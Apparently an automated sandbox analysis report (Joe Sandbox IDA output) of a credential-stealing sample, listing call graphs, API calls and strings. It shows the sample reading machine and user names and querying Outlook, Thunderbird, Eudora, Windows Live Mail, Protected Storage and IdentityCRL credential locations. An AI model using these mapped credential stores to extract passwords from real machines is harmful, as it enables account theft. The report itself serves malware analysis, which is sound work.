4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34039 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33879 34048->33876 34049->34038 34050->34041 34051->34044 34052->34046 34053->33900 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34095 444196 52 API calls 34062->34095 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34092 407f90 34066->34092 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34096 407e62 strcmp strcmp 34070->34096 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33922 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34097 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34097 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34085 407f3f 34083->34085 34086 407f46 strlen strlen 34084->34086 34087 407f3a 34084->34087 34085->34086 34089 407f7f 34085->34089 34086->34089 34090 407f76 34086->34090 34088 407f90 FindClose 34087->34088 34088->34085 34089->34060 34098 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34098 34093 407fa3 34092->34093 34094 407f99 FindClose 34092->34094 34093->34071 34094->34093 34095->34060 34096->34070 34097->34080 34098->34089 34099->33524 34100->33528 34101->33534 34102->33536 34103->33541 34104->33538 34105->33533 34114 411853 RtlInitializeCriticalSection memset 34115 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34288 40a256 13 API calls 34290 432e5b 17 API calls 34292 43fa5a 20 API calls 34117 401060 41 API calls 34295 427260 CloseHandle memset memset 33198 410c68 FindResourceA 33199 410c81 SizeofResource 33198->33199 33202 410cae 33198->33202 33200 410c92 LoadResource 33199->33200 33199->33202 33201 410ca0 LockResource 33200->33201 33200->33202 33201->33202 34297 405e69 14 API calls 34122 433068 15 API calls __fprintf_l 34299 414a6d 18 API calls 34300 43fe6f 134 API calls 34124 424c6d 15 API calls __fprintf_l 34301 426741 19 API calls 34126 440c70 17 API calls 34127 443c71 44 API calls 34130 427c79 24 API calls 34304 416e7e memset __fprintf_l 34134 42800b 47 API calls 34135 425115 85 API calls __fprintf_l 34307 41960c 61 API calls 34136 43f40c 122 API calls __fprintf_l 34139 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34140 43f81a 20 API calls 34142 414c20 memset memset 34143 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34311 414625 18 API calls 34312 404225 modf 34313 403a26 strlen WriteFile 34315 40422a 12 API calls 34319 427632 memset memset memcpy 34320 40ca30 59 API calls 34321 404235 26 API calls 34144 42ec34 61 API calls __fprintf_l 34145 425115 76 API calls __fprintf_l 34322 425115 77 API calls __fprintf_l 34324 44223a 38 API calls 34151 43183c 112 API calls 34325 44b2c5 _onexit __dllonexit 34330 42a6d2 memcpy __allrem 34153 405cda 65 API calls 34338 43fedc 138 API calls 34339 4116e1 16 API calls __fprintf_l 34156 4244e6 19 API calls 34158 42e8e8 127 API calls __fprintf_l 34159 4118ee RtlLeaveCriticalSection 34344 43f6ec 22 API calls 34161 425115 119 API calls __fprintf_l 33188 410cf3 EnumResourceNamesA 34347 4492f0 memcpy memcpy 34349 43fafa 18 API calls 34351 4342f9 15 API calls __fprintf_l 34162 4144fd 19 API calls 34353 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34354 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34357 443a84 _mbscpy 34359 43f681 17 API calls 34165 404487 22 API calls 34361 415e8c 16 API calls __fprintf_l 34169 411893 RtlDeleteCriticalSection __fprintf_l 34170 41a492 42 API calls 34365 403e96 34 API calls 34366 410e98 memset SHGetPathFromIDList SendMessageA 34172 426741 109 API calls __fprintf_l 34173 4344a2 18 API calls 34174 4094a2 10 API calls 34369 4116a6 15 API calls __fprintf_l 34370 43f6a4 17 API calls 34371 440aa3 20 API calls 34373 427430 45 API calls 34177 4090b0 7 API calls 34178 4148b0 15 API calls 34180 4118b4 RtlEnterCriticalSection 34181 4014b7 CreateWindowExA 34182 40c8b8 19 API calls 34184 4118bf RtlTryEnterCriticalSection 34378 42434a 18 API calls __fprintf_l 34380 405f53 12 API calls 34192 43f956 59 API calls 34194 40955a 17 API calls 34195 428561 36 API calls 34196 409164 7 API calls 34384 404366 19 API calls 34388 40176c ExitProcess 34391 410777 42 API calls 34201 40dd7b 51 API calls 34202 425d7c 16 API calls __fprintf_l 34393 43f6f0 25 API calls 34394 42db01 22 API calls 34203 412905 15 API calls __fprintf_l 34395 403b04 54 API calls 34396 405f04 SetDlgItemTextA GetDlgItemTextA 34397 44b301 ??3@YAXPAX 34400 4120ea 14 API calls 3 library calls 34401 40bb0a 8 API calls 34403 413f11 strcmp 34207 434110 17 API calls __fprintf_l 34210 425115 108 API calls __fprintf_l 34404 444b11 _onexit 34212 425115 76 API calls __fprintf_l 34215 429d19 10 API calls 34407 444b1f __dllonexit 34408 409f20 _strcmpi 34217 42b927 31 API calls 34411 433f26 19 API calls __fprintf_l 34412 44b323 FreeLibrary 34413 427f25 46 API calls 34414 43ff2b 17 API calls 34415 43fb30 19 API calls 34224 414d36 16 API calls 34226 40ad38 7 API calls 34417 433b38 16 API calls __fprintf_l 34418 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34230 426741 21 API calls 34231 40c5c3 125 API calls 34233 43fdc5 17 API calls 34419 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34236 4161cb memcpy memcpy memcpy memcpy 33203 44b3cf 33204 44b3e6 33203->33204 33206 44b454 33203->33206 33204->33206 33210 44b40e 33204->33210 33207 44b405 33207->33206 33208 44b435 VirtualProtect 33207->33208 33208->33206 33209 44b444 VirtualProtect 33208->33209 33209->33206 33211 44b413 33210->33211 33214 44b454 33211->33214 33217 44b42b 33211->33217 33213 44b41c 33213->33214 33215 44b435 VirtualProtect 33213->33215 33215->33214 33216 44b444 VirtualProtect 33215->33216 33216->33214 33218 44b431 33217->33218 33219 44b435 VirtualProtect 33218->33219 33221 44b454 33218->33221 33220 44b444 VirtualProtect 33219->33220 33219->33221 33220->33221 34424 43ffc8 18 API calls 34237 4281cc 15 API calls __fprintf_l 34426 4383cc 110 API calls __fprintf_l 34238 4275d3 41 API calls 34427 4153d3 22 API calls __fprintf_l 34239 444dd7 _XcptFilter 34432 4013de 15 API calls 34434 425115 111 API calls __fprintf_l 34435 43f7db 18 API calls 34438 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34241 4335ee 16 API calls __fprintf_l 34440 429fef 11 API calls 34242 444deb _exit _c_exit 34441 40bbf0 138 API calls 34245 425115 79 API calls __fprintf_l 34445 437ffa 22 API calls 34249 4021ff 14 API calls 34250 43f5fc 149 API calls 34446 40e381 9 API calls 34252 405983 40 API calls 34253 42b186 27 API calls __fprintf_l 34254 427d86 76 API calls 34255 403585 20 API calls 34257 42e58e 18 API calls __fprintf_l 34260 425115 75 API calls __fprintf_l 34262 401592 8 API calls 33189 410b92 33192 410a6b 33189->33192 33191 410bb2 33193 410a77 33192->33193 33194 410a89 GetPrivateProfileIntA 33192->33194 33197 410983 memset _itoa WritePrivateProfileStringA 33193->33197 33194->33191 33196 410a84 33196->33191 33197->33196 34450 434395 16 API calls 34264 441d9c memcmp 34452 43f79b 119 API calls 34265 40c599 43 API calls 34453 426741 87 API calls 34269 4401a6 21 API calls 34271 426da6 memcpy memset memset memcpy 34272 4335a5 15 API calls 34274 4299ab memset memset memcpy memset memset 34275 40b1ab 8 API calls 34458 425115 76 API calls __fprintf_l 34462 4113b2 18 API calls 2 library calls 34466 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33235 40765c 33233->33235 33234->33232 33236 4076a3 33235->33236 33239 40737c strtoul 33235->33239 33236->33232 33238->33231 33239->33235 34277 40b5bf memset memset _mbsicmp

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                  APIs
                                                  • memset.MSVCRT ref: 0040832F
                                                  • memset.MSVCRT ref: 00408343
                                                  • memset.MSVCRT ref: 0040835F
                                                  • memset.MSVCRT ref: 00408376
                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                  • strlen.MSVCRT ref: 004083E9
                                                  • strlen.MSVCRT ref: 004083F8
                                                  • memcpy.MSVCRT ref: 0040840A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                  • String ID: 5$H$O$b$i$}$}
                                                  • API String ID: 1832431107-3760989150
                                                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                  • strlen.MSVCRT ref: 00407F5C
                                                  • strlen.MSVCRT ref: 00407F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindstrlen$FirstNext
                                                  • String ID: ACD
                                                  • API String ID: 379999529-620537770
                                                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 00401E8B
                                                  • strlen.MSVCRT ref: 00401EA4
                                                  • strlen.MSVCRT ref: 00401EB2
                                                  • strlen.MSVCRT ref: 00401EF8
                                                  • strlen.MSVCRT ref: 00401F06
                                                  • memset.MSVCRT ref: 00401FB1
                                                  • atoi.MSVCRT ref: 00401FE0
                                                  • memset.MSVCRT ref: 00402003
                                                  • sprintf.MSVCRT ref: 00402030
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • memset.MSVCRT ref: 00402086
                                                  • memset.MSVCRT ref: 0040209B
                                                  • strlen.MSVCRT ref: 004020A1
                                                  • strlen.MSVCRT ref: 004020AF
                                                  • strlen.MSVCRT ref: 004020E2
                                                  • strlen.MSVCRT ref: 004020F0
                                                  • memset.MSVCRT ref: 00402018
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  • _mbscpy.MSVCRT ref: 00402177
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                  • API String ID: 1846531875-4223776976
                                                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                  • API String ID: 745651260-375988210
                                                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                  • _mbscpy.MSVCRT ref: 00403E54
                                                  Strings
                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                  • pstorec.dll, xrefs: 00403C30
                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                  • API String ID: 1197458902-317895162
                                                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                  • String ID: k:v
                                                  • API String ID: 3662548030-4078055367
                                                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040FBE4
                                                  • memcpy.MSVCRT ref: 0040FBF9
                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                  • API String ID: 2768085393-2409096184
                                                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0044430B
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                  • memset.MSVCRT ref: 00444379
                                                  • memset.MSVCRT ref: 00444394
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                  • strlen.MSVCRT ref: 004443DB
                                                  • _strcmpi.MSVCRT ref: 00444401
                                                  Strings
                                                  • Store Root, xrefs: 004443A5
                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                  • API String ID: 832325562-2578778931
                                                  • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                  • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F567
                                                  • memset.MSVCRT ref: 0040F57F
                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040F652
                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.3045366925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
